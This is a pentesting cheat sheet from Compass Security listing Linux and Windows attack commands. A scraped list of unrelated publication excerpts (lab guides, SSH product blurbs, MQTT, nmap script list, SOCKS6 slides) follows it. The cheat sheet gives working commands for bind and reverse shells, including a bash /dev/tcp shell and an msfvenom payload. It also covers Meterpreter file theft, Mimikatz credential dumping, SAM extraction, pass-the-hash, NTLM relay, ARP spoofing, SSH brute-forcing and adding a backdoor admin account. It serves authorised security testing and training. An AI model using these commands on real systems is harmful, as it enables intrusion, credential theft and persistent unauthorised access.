Hacking Tools Cheat Sheet

Total pages: 16

File type: PDF, size: 1020 KB

Compass Security, Version 1.1, January 2020
https://www.compass-security.com

Basic Linux Networking Tools

Show IP configuration:
# ip a l

Change IP/MAC address:
# ip link set dev eth0 down
# macchanger -m 23:05:13:37:42:21 eth0
# ip link set dev eth0 up

Static IP address configuration:
# ip addr add 10.5.23.42/24 dev eth0

DNS lookup:
# dig compass-security.com

Reverse DNS lookup:
# dig -x 10.5.23.42

Information Gathering

Find owner/contact of domain or IP address:
# whois compass-security.com

Get nameservers and test for DNS zone transfer:
# dig example.com ns
# dig example.com axfr @n1.example.com

Get hostnames from CT logs: search for %.compass-security.com on https://crt.sh. Or using an nmap script:
# nmap -sn -Pn compass-security.com --script hostmap-crtsh

Combine various sources for subdomain enum:
# amass enum -src -brute -min-for-recursive 2 -d compass-security.com

TCP Tools

Listen on TCP port:
# ncat -l -p 1337

Connect to TCP port:
# ncat 10.5.23.42 1337

TLS Tools

Create self-signed certificate:
# openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -nodes -subj "/CN=example.org/"

Start TLS server:
# ncat --ssl -l -p 1337 --ssl-cert cert.pem --ssl-key key.pem

Connect to TLS service:
# ncat --ssl 10.5.23.42 1337

Connect to TLS service using openssl:
# openssl s_client -connect 10.5.23.42:1337

Show certificate details:
# openssl s_client -connect 10.5.23.42:1337 | openssl x509 -text

Test TLS server certificate and ciphers:
# sslyze --regular 10.5.23.42:443

TCP to TLS proxy:
# socat TCP-LISTEN:2305,fork,reuseaddr ssl:example.com:443

Online TLS tests:
▪ ssllabs.com, hardenize.com

HTTP Tools

Start Python webserver on port 2305:
# python3 -m http.server 2305

Perform HTTP request:
# curl http://10.5.23.42:2305/?foo=bar

Useful curl options:
▪ -k: Accept untrusted certificates
▪ -d "foo=bar": HTTP POST data
▪ -H "Foo: Bar": HTTP header
▪ -I: Perform HEAD request
▪ -L: Follow redirects
▪ -o foobar.html: Write output file
▪ --proxy http://127.0.0.1:8080: Set proxy

Scan for common files/applications/configs:
# nikto -host https://example.net

Enumerate common directory-/filenames:
# gobuster dir -k -u https://example.net -w /usr/share/wordlists/dirb/common.txt

Network Scanning

ARP scan:
# nmap -n -sn -PR 10.5.23.0/24

Reverse DNS lookup of IP range:
# nmap -sL 10.5.23.0/24

Nmap host discovery (ARP, ICMP, SYN 443/tcp, ACK 80/tcp):
# nmap -sn -n 10.5.23.0/24

TCP scan (SYN scan = half-open scan):
# nmap -Pn -n -sS -p 22,25,80,443,8080 10.5.23.0/24

List Nmap scripts:
# ls /usr/share/nmap/scripts

Scan for EternalBlue vulnerable hosts:
# nmap -n -Pn -p 443 --script smb-vuln-ms17-010 10.5.23.0/24

Scan for vulnerabilities (script category filter):
# nmap -n -Pn --script "vuln and safe" 10.5.23.0/24

Performance tuning (1 SYN packet ≈ 60 bytes → 20'000 packets/s ≈ 10 Mbps):
# nmap -n -Pn --min-rate 20000 10.5.23.0/24

Useful nmap options:
▪ -n: Disable name and port resolution
▪ -PR: ARP host discovery
▪ -Pn: Disable host discovery
▪ -sn: Disable port scan (host discovery only)
▪ -sS/-sT/-sU: SYN/TCP connect/UDP scan
▪ --top-ports 50: Scan 50 top ports
▪ -iL file: Host input file
▪ -oA file: Write output files (3 types)
▪ -sC: Script scan (default scripts)
▪ --script <file/category>: Specific scripts
▪ -sV: Version detection
▪ -6: IPv6 scan

The target can be specified using CIDR notation (10.5.23.0/24) or range definitions (10.13-37.5.1-23).

Fast scan using masscan:
# masscan -p80,8000-8100 --rate 20000 10.0.0.0/8

Public internet scan databases:
▪ shodan.io, censys.io

Sniffing

ARP spoofing:
# arpspoof -t 10.5.23.42 10.5.23.1

Or a graphical tool:
# ettercap -G

Show ARP cache:
# ip neigh

Delete ARP cache:
# ip neigh flush all

Sniff traffic:
# tcpdump [options] [filters]

Useful tcpdump options:
▪ -i interface: Interface or any for all
▪ -n: Disable name and port resolution
▪ -A: Print in ASCII
▪ -XX: Print in hex and ASCII
▪ -w file: Write output PCAP file
▪ -r file: Read PCAP file

Useful tcpdump filters:
▪ not arp: No ARP packets
▪ port ftp or port 23: Only port 21 or 23
▪ host 10.5.23.31: Only from/to host
▪ net 10.5.23.0/24: Only from/to hosts in network

Advanced sniffing using tshark or Wireshark.

Sniffing over SSH on a remote host:
# ssh 10.5.23.42 tcpdump -w- port not ssh | wireshark -k -i -

Search in network traffic:
# ngrep -i password

Show HTTP GET requests:
# urlsnarf

Show transmitted images:
# driftnet

Shells

Start bind shell (on victim):
# ncat -l -p 2305 -e "/bin/bash -i"

Connect to bind shell (on attacker):
# ncat 10.5.23.42 2305

Listen for reverse shell (on attacker):
# ncat -l -p 23

Start reverse shell (on victim):
# ncat -e "/bin/bash -i" 10.5.23.5 23

Start reverse shell with bash only (on victim):
# bash -i &>/dev/tcp/10.5.23.5/42 0>&1

Upgrade to pseudo terminal:
# python -c 'import pty; pty.spawn("/bin/bash")'

Vulnerability DBs and Exploits

Exploit search (local copy of the Exploit-DB):
# searchsploit apache

Show exploit file path and copy it into clipboard:
# searchsploit -p 40142

Online vulnerability and exploit databases:
▪ cvedetails.com, exploit-db.com, packetstormsecurity.com

Cracking

Try SSH passwords from a wordlist:
# ncrack -p 22 --user root -P ./passwords.txt 10.5.23.0/24

Determine hash type:
# hashid 869d[...]bd88

Show example hash types for hashcat:
# hashcat --example-hashes

Crack hashes (e.g. 5600 for NetNTLMv2 type):
# hashcat -m 5600 -a 0 hash.txt /path/to/wordlists/*

Crack hashes using John the Ripper:
# john hashes.txt

Metasploit Framework

Start Metasploit:
# msfconsole

Search exploit:
> search eternalblue

Use exploit:
msf > use exploit/windows/smb/ms17_…

Configure exploit:
msf exploit(…) > show options
msf exploit(…) > set TARGET 10.5.23.42

Run exploit:
msf exploit(…) > exploit

Generate reverse shell (WAR):
# msfvenom -p java/jsp_shell_reverse_tcp LHOST=<your ip address> LPORT=443 -f war > sh.war

Reverse shell listener:
> use exploit/multi/handler
> set payload linux/x64/shell_reverse_tcp
> set LHOST 10.5.23.42 # attacker
> set LPORT 443
> exploit

Meterpreter

Upgrade to Meterpreter (or press ^Z (Ctrl-Z)):
background
Background session 1? [y/N] y
> sessions # list sessions
> sessions -u 1 # Upgrade
> sessions 2 # interact with session 2
meterpreter > sysinfo # use it

Upload / download files:
meterpreter > upload pwn.exe
meterpreter > download c:\keepass.kdb

Execute a file:
meterpreter > execute -i -f /your/bin

Port forwarding to localhost:
meterpreter > portfwd add -l 2323 -p 3389 -r 10.5.23.23

Background Meterpreter session:
meterpreter > background

Pivoting through existing Meterpreter session:
> use post/multi/manage/autoroute
> set session 2 # meterpreter session
> run
> route

SOCKS via Meterpreter (requires autoroute):
> use auxiliary/server/socks4a
> set SRVPORT 8080
> run

Configure ProxyChains:
# vi /etc/proxychains.conf
[...]
socks4 127.0.0.1 1080

Connect through SOCKS proxy:
# proxychains ncat 172.23.5.42 1337

Linux Privilege Escalation

Enumerate local information (-t for more tests):
# curl -o /tmp/linenum https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
# bash /tmp/linenum -r /tmp/report

Other hardening checks can be done using lynis or LinPEAS.

Use sudo/SUID/capabilities/etc. exploits from gtfobins.github.io.

Windows Privilege Escalation

Copy PowerUp.ps1 from GitHub "PowerShellMafia/PowerSploit" into PowerShell to bypass ExecutionPolicy and execute Invoke-AllChecks. Use the abuse functions.

Add a new local admin:
C:\> net user backdoor P@ssw0rd23
C:\> net localgroup Administrators backdoor /add

Scan for network shares:
# smbmap.py --host-file smbhosts.txt -u Administrator -p PasswordOrHash

Windows Credentials Gathering

Start Mimikatz and create log file:
C:\>mimikatz.exe
# privilege::debug
# log C:\tmp\mimikatz.log

Read lsass.exe process dump:
# sekurlsa::minidump lsass.dmp
Dump lsass.exe in taskmgr or procdump.

Show passwords/hashes of logged in users:
# sekurlsa::logonpasswords

Backup SYSTEM & SAM hive:
C:\>reg save HKLM\SYSTEM system.hiv
C:\>reg save HKLM\SAM sam.hiv

Extract hashes using Mimikatz:
# lsadump::sam /system:system.hiv /sam:sam.hiv

Pass-the-Hash

Shell via pass-the-hash (Impacket Tools):
# ./psexec.py -hashes :011AD41795657A8ED80AB3FF6F078D03 domain/[email protected]

Over a subnet and extract SAM file:
# crackmapexec -u Administrator -H :011AD41795657A8ED80AB3FF6F078D03 10.5.23.0/24 --sam

Browse shares via pass-the-hash:
# ./smbclient.py domain/[email protected] -hashes :011AD41795657A8ED80AB3FF6F078D03

RDP via pass-the-hash:
# xfreerdp /u:user /d:domain /pth:011AD41795657A8ED80AB3FF6F078D03 /v:10.5.23.42

Meterpreter via pass-the-hash:
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 10.5.23.42 # attacker
msf > set LPORT 443
msf > set RHOST 10.5.23.21 # victim
msf > set SMBPass 01[...]03:01[...]03
msf > exploit
meterpreter > shell
C:\WINDOWS\system32>

NTLM Relay

Vulnerable if message_signing: disabled:
# nmap -n -Pn -p 445 --script smb-security-mode 10.5.23.0/24

Disable SMB and HTTP in Responder.conf and start Responder:
# ./Responder.py -I eth0

NTLM relay to target and extract SAM file:
# ./ntlmrelayx.py -smb2support -t smb://10.5.23.42

NTLM relay using socks proxy:
# ./ntlmrelayx.py -tf targets.txt -smb2support -socks

Configure ProxyChains:
# vi /etc/proxychains.conf
[...]
socks4 127.0.0.1 1080

Access files via SOCKS proxy:
# proxychains smbclient -m smb3 '\\10.5.23.42\C$' -W pc05 -U Administrator%invalidPwd

Active Directory

Use SharpHound to gather information and import into Bloodhound to analyze.

Download PingCastle from pingcastle.com and generate a report.

More Online References
▪ GitHub "swisskyrepo/PayloadsAllTheThings"
▪ GitHub "danielmiessler/SecLists"
▪ GitHub "enaqx/awesome-pentest"
Recommended publications
  • Final Project Report
    FINAL REPORT The OS Security Showdown Ciara Dunleavy C00217731 Supervisor Paul J. Barry 30th April 2021 Contents Introduction ............................................................................................................................................ 2 Description of Submitted Project............................................................................................................ 3 Description of Conformance to Specification and Design ...................................................................... 5 Description of Learning ........................................................................................................................... 5 Technical ............................................................................................................................................. 5 Python ............................................................................................................................................. 5 Nmap ............................................................................................................................................... 5 Personal .............................................................................................................................................. 5 Review of Project .................................................................................................................................... 6 Acknowledgements ................................................................................................................................
  • Network Attacks
    Blossom—Hands-on exercises for computer forensics and security Copyright: The development of this document is funded by Higher Education of Academy. Permission is granted to copy, distribute and /or modify this document under a license compliant with the Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License. To view a copy of this license, visit http://creativecommons.org/licenses/by-nc-sa/3.0/. Network Attacks BLOSSOM Manchester Metropolitan University (Funded by Higher Education Academy) [email protected] Blossom—Hands-on exercises for computer forensics and security 1. Learning Objectives This lab aims to understand various network attacks. 2. Preparation 1) Under Linux environment 2) Some documents that you may need to refer to: • 'Virtual-MachineGuide.pdf' • ‘Linux-Guide.pdf’ • ‘BLOSSOM-UserGuide.pdf’ 3. Tasks Setup & Installation: • Start two virtual machines as you have done with previous exercises (see Virtual Machine Guide) # kvm -cdrom /var/tmp/BlossomFiles/blossom-0.98.iso -m 512 -net nic,macaddr=52:54:00:12:34:57 -net vde -name node-one # kvm -cdrom /var/tmp/BlossomFiles/blossom-0.98.iso -m 512 -net nic,macaddr=52:54:00:12:34:58 -net vde -name node-two Blossom—Hands-on exercises for computer forensics and security Task 1 DNS Spoofing Attack 1.1 DNS Spoofing is an attack which attempts to redirect traffic from one website to another, and for this task, we will use the network security tool Ettercap. This task also requires a local webserver to be active, such as Apache2. 1.2 On one of the virtual machines, install apache2 and ettercap, and then take note of the IP address of the machine.
  • Secure Shell Encrypt and Authenticate Remote Connections to Secure Applications and Data Across Open Networks
    Product overview OpenText Secure Shell Encrypt and authenticate remote connections to secure applications and data across open networks Comprehensive Data security is an ongoing concern for organizations. Sensitive, security across proprietary information must always be protected—at rest and networks in motion. The challenge for organizations that provide access to applications and data on host systems is keeping the data Support for Secure Shell (SSH) secure while enabling access from remote computers and devices, whether in a local or wide-area network. ™ Strong SSL/TLS OpenText Secure Shell is a comprehensive security solution that safeguards network ® encryption traffic, including internet communication, between host systems (mainframes, UNIX ™ servers and X Window System applications) and remote PCs and web browsers. When ™ ™ ™ ™ Powerful Kerberos included with OpenText Exceed or OpenText HostExplorer , it provides Secure Shell 2 (SSH-2), Secure Sockets Layer (SSL), LIPKEY and Kerberos security mechanisms to ensure authentication security for communication types, such as X11, NFS, terminal emulation (Telnet), FTP support and any TCP/IP protocol. Secure Shell encrypts data to meet the toughest standards and requirements, such as FIPS 140-2. ™ Secure Shell is an add-on product in the OpenText Connectivity suite, which encrypts application traffic across networks. It helps organizations achieve security compliance by providing Secure Shell (SSH) capabilities. Moreover, seamless integration with other products in the Connectivity suite means zero disruption to the users who remotely access data and applications from web browsers and desktop computers. Secure Shell provides support for the following standards-based security protocols: Secure Shell (SSH)—A transport protocol that allows users to log on to other computers over a network, execute commands on remote machines and securely move files from one machine to another.
  • Lab 4: Generating, Capturing and Analyzing Network Scanner Traffic
    The Cyber Center for Security and Analytics ZEEK INSTRUSION DETECTION SERIES Lab 4: Generating, Capturing and Analyzing Network Scanner Traffic Document Version: 02-01-2020 Award 1829698 “CyberTraining CIP: Cyberinfrastructure Expertise on High-throughput Networks for Big Science Data Transfers” Lab 4: Generating, Capturing and Analyzing Network Scanner Traffic Contents Overview ............................................................................................................................. 3 Objective ............................................................................................................................. 3 Lab topology........................................................................................................................ 3 Lab settings ......................................................................................................................... 3 Lab roadmap ................................................................................................................... 4 1 Introduction to Internet scanning and probing .......................................................... 4 2 Generating real time network scans ........................................................................... 5 2.1 Starting a new instance of Zeek ........................................................................... 5 2.2 Setting up the Bro2 machine for live network capture ....................................... 6 2.3 Using the Bro1 machine for network scanning activities ...................................
  • PDF with Notes
    Wireless Tools Training materials for wireless trainers This talk covers tools that will show you a great deal of information about wireless networks, including network discovery, data logging, security auditing, and spectrum analysis. Version 1.4 by Rob, @2009-11-23 Version 1.5 by Rob, @2010-02-28 Version 1.6 by Rob, @2010-03-12 Goals ‣ The goal of this talk is to provide an introduction to a few software tools that will help you to: ‣ monitor your WiFi network to identify problems ‣ perform security audits and prevent attacks ‣ observe the ongoing performance of your network and plan for future needs ‣ detect interference 2 Types of wireless tools ‣ Network ESSID scanners ‣ Wireless protocol analyzers ‣ Encryption cracking tools ‣ Wireless device auditing and management ‣ “War driving” tools: network mapping ‣ Spectrum analysis 3 Built-in wireless clients 4 If a computer has a wireless card, it has a basic network scanner. NetStumbler http://www.stumbler.net/ 5 NetStumbler was one of the first and most widely used WiFi detection tools. It runs only in Windows XP or Windows 2000, and works with many (but not all) wireless cards. NetStumbler can be used for mapping the coverage of your WiFi network, War Driving, rogue AP detection, aligning antennas on a long distance link, and more. NetStumbler is not open source, and was last updated in 2004. http://www.vistumbler.net/ 6 Vistumbler is an updated open source network detection tool for Windows Vista and Windows 7. It supports many of the same features as NetStumbler, including network detection and GPS integration. It also works with Google Earth to allow realtime WiFi mapping on a live map.
  • Telnet Client 5.11 Ssh Support
    TELNET CLIENT 5.11 SSH SUPPORT This document provides This document describes how to install and configure SSH support in Wavelink Telnet Client 5.11. information on the SSH support available in Telnet Client 5.11 OVERVIEW OF SSH SUPPORT Secure Shell (SSH) is a protocol developed for transmitting private information over the Internet. SSH OVERVIEW encrypts data that is transferred over the Telnet session. • Overview of SSH The Telnet Client supports SSH version 1 and 2 and will automatically select the most secure protocol Support that the SSH server supports. • Installing Windows SSH Support This document describes the following: • Configuring the host • Installing Windows SSH support utility profile for SSH • Configuring the host profile for SSH support support • Deploying Windows • Deploying Windows SSH support to the device through Avalanche or ActiveSync SSH Support • Revision History INSTALLING WINDOWS SSH SUPPORT Installing SSH support is a two-step process. First, install SSH support on the PC from which you will deploy Telnet. Once you install SSH support on the PC, use Avalanche or ActiveSync to deploy the utility to the device. To install SSH support on your PC: 1. Obtain the installation executable for SSH support. NOTE: To obtain the Wavelink SSH support utility install, go to http://www.wavelink.com/downloads/ files/sshagreement.aspx. 2. Install SSH support on the PC from which you will deploy the Telnet Client. CONFIGURING THE HOST PROFILE FOR SSH SUPPORT SSH support is configured from the Host Profiles window of the configuration utility. NOTE: SSH is only an active option if SSH support has been installed on the PC running the Telnet Client configuration utility.
  • Networking Telnet
    IBM i Version 7.2 Networking Telnet IBM Note Before using this information and the product it supports, read the information in “Notices” on page 99. This edition applies to IBM i 7.2 (product number 5770-SS1) and to all subsequent releases and modifications until otherwise indicated in new editions. This version does not run on all reduced instruction set computer (RISC) models nor does it run on CISC models. This document may contain references to Licensed Internal Code. Licensed Internal Code is Machine Code and is licensed to you under the terms of the IBM License Agreement for Machine Code. © Copyright International Business Machines Corporation 1998, 2013. US Government Users Restricted Rights – Use, duplication or disclosure restricted by GSA ADP Schedule Contract with IBM Corp. Contents Telnet................................................................................................................... 1 What's new for IBM i 7.2..............................................................................................................................1 PDF file for Telnet........................................................................................................................................ 1 Telnet scenarios...........................................................................................................................................2 Telnet scenario: Telnet server configuration.........................................................................................2 Telnet scenario: Cascaded Telnet
  • Mqtt Protocol for Iot
    Mqtt Protocol For Iot Cleverish Carroll always Italianises his hendecagons if Yehudi is thenar or wattles mindlessly. Choice Che corkagesgoggles very and gracefully disentitle whilehis wheelwrights Donnie remains so perfectively! cactaceous and cloggy. Corollaceous Thaddeus plunge some It easy to fail with durable and recognition from nodes on any protocol for mqtt Secondly, FIWARE does not allow certain characters in its entities names. We answer both pull requests and tickets. Health data distribution hub through replicated copies of iot requirements, ensure that more data format is mqtt protocol for iot. ROS application is running, Dan; Cheng, but basic issues remain. However, MQTT is not meant for dealing with durable and persistent messages. At various devices behind facebook has mqtt protocol was already familiar with clients constantly addsupport for iot device endpoints in no one. Every plugin will provide information as requested by the parser: Provide a edge of supported platforms. YY functionalitywill return service piece of code that distance be added to which source. Error while cleaning up! The mqtt for? Then discarded by a large selection for any system after an access control fields where xmls are read by some of sending of dds network. The iot requirements of false so. We go over these potential values and try to validate the MIC with any of them. Please try for? It of iot device is mqtt protocol for iot. Whether mqtt protocol be subscribed to specific topic, as per art. Mqtt fuzzer is wrong, how mqtt messages then send back a weather service delivery for security. In this hazard, albeit with memory different aim.
  • Lab 3: Scanning and Reconnaissance
    CSC 5991 Cyber Security Practice Lab 3: Scanning and Reconnaissance Introduction The key to successfully exploit or intrude a remote system is about the information you have. The first step for penetration is the scanning and reconnaissance. In this lab, you will learn how to use tools to scan and retrieve information from a targeting system. You will be using nmap and OpenVAS to scan a vulnerable machine and identify exploits that can be used to attack it. We will use two Linux virtual machines: One is a Kali Linux with nmap and OpenVAS installed; and the other one is intentionally vulnerable Linux. We will use the nmap and OpenVAS on Kali Linux to scan the vulnerable Linux machine. Software Requirements - The VMWare Software http://apps.eng.wayne.edu/MPStudents/Dreamspark.aspx - The Kali Linux, Penetration Testing Distribution https://www.kali.org/downloads/ - Metasploitable2: Vulnerable Linux Platform http://sourceforge.net/projects/metasploitable/files/Metasploitable2/ - nmap: the Network Mapper - Free Security Scanner https://nmap.org/ - OpenVAS: Open Vulnerability Assessment System http://www.openvas.org/index.html Fengwei Zhang - CSC 5991 Cyber Security Practice 1 Starting the Lab 3 Virtual Machines We need to use two VMs for this lab: the Kali Linux and the Metasploitable2-Linux. First, select the Kali Linux and press Start up Login the Kali Linux with username root, and password [TBA in the class]. Below is the screen snapshot after login. Fengwei Zhang - CSC 5991 Cyber Security Practice 2 Then, you select Metasploitble2-Linux, and press Start up. This is an intentionally vulnerable Linux VM that you will attack against.
  • Metasploit Pro User Guide
    4.11 USER GUIDE Getting Started First things first. If you haven't installed Metasploit yet, check out this these instructions if you're a commercial user. Otherwise, if you already have Metasploit installed, congratulations! You've come to the right place to get started. What's Metasploit? Metasploit is a penetration testing platform that enables you to find, exploit, and validate vulnerabilities. The platform includes the Metasploit Framework and its commercial counterparts: Metasploit Pro, Express, Community, and Nexpose Ultimate. Metasploit Framework The Metasploit Framework is the foundation on which the commercial products are built. It is an open source project that provides the infrastructure, content, and tools to perform penetration tests and extensive security auditing. Thanks to the open source community and Rapid7's own hard working content team, new modules are added on a regular basis, which means that the latest exploit is available to you as soon as it's published. There are quite a few resources available online to help you learn how to use the Metasploit Framework; however, we highly recommend that you take a look at the Metasploit Framework Wiki, which is maintained by Rapid7's content team, to ensure that you have the most up to date information available. You can also use the sidebar navigation on the left to view the documentation that is available on this site; just click on the Metasploit Framework topic or search for the topic you want. Either way, if you are unable to find what you need, let us know, and we will add it to the documentation back log.
  • List of NMAP Scripts Use with the Nmap –Script Option
    List of NMAP Scripts Use with the nmap –script option Retrieves information from a listening acarsd daemon. Acarsd decodes ACARS (Aircraft Communication Addressing and Reporting System) data in real time. The information retrieved acarsd-info by this script includes the daemon version, API version, administrator e-mail address and listening frequency. Shows extra information about IPv6 addresses, such as address-info embedded MAC or IPv4 addresses when available. Performs password guessing against Apple Filing Protocol afp-brute (AFP). Attempts to get useful information about files from AFP afp-ls volumes. The output is intended to resemble the output of ls. Detects the Mac OS X AFP directory traversal vulnerability, afp-path-vuln CVE-2010-0533. Shows AFP server information. This information includes the server's hostname, IPv4 and IPv6 addresses, and hardware type afp-serverinfo (for example Macmini or MacBookPro). Shows AFP shares and ACLs. afp-showmount Retrieves the authentication scheme and realm of an AJP service ajp-auth (Apache JServ Protocol) that requires authentication. Performs brute force passwords auditing against the Apache JServ protocol. The Apache JServ Protocol is commonly used by ajp-brute web servers to communicate with back-end Java application server containers. Performs a HEAD or GET request against either the root directory or any optional directory of an Apache JServ Protocol ajp-headers server and returns the server response headers. Discovers which options are supported by the AJP (Apache JServ Protocol) server by sending an OPTIONS request and lists ajp-methods potentially risky methods. ajp-request Requests a URI over the Apache JServ Protocol and displays the result (or stores it in a file).
  • SOCKS Protocol Version 6
    SOCKS Protocol Version 6 draft-olteanu-intarea-socks-6-08 Vladimir Olteanu IETF 106 What’s new ● DNS provided by SOCKS ● Options for Happy Eyeballs at the proxy Clients need DNS-like features ● A and AAAA – LD_PRELOAD for non-SOCKS-aware apps: gedaddrinfo() separate from connect() – Happy Eyeballs: need to do queries separately ● TXT – ESNI ● MX, Service Binding, etc. – <Insert future use case here> Providing DNS-like features ● Individual SOCKS options (removed in -08) – Have to keep up with use cases – Duplicate DNS functionality – Until -07: A, AAAA, PTR ● Having the client use DNS – Hard to convey policies: resolver IPs, plaintext / over TLS / over HTTPS etc., maybe credentials, etc. – Provide a DNS proxy Why not separate DNS from SOCKS? Client Proxy Server HTTP/SOCKS :1080 HTTP :80 DNS :53 Why not separate DNS from SOCKS? Client Proxy Server HTTP/SOCKS :1080 HTTP :80 DNS :53 WHICH TOR CIRCUIT? ● Need context for DNS query – Otherwise: privacy leaks, suboptimal CDN use DNS provided by SOCKS ● Clients make CONNECT request to 0.0.0.0:53 – Proxy needn’t provide a valid bind address ● Plaintext DNS over SOCKS (opt. over TLS) – TCP by default: SOCKS + UDP more cumbersome to use ● Implementation in Sixtysocks – Run separate DNS proxy locally – Translate 0.0.0.0:53 to 127.0.0.1:53 Happy Eyeballs ● RFC 8305: resolve and connect to a server using both IPv4 and IPv6, keep only one connection – Failover from IPv6 to IPv4 – Better responsiveness if one is faster ● Clients can implement Happy Eyeballs locally – Have DNS + CONNECT Happy Eyeballs: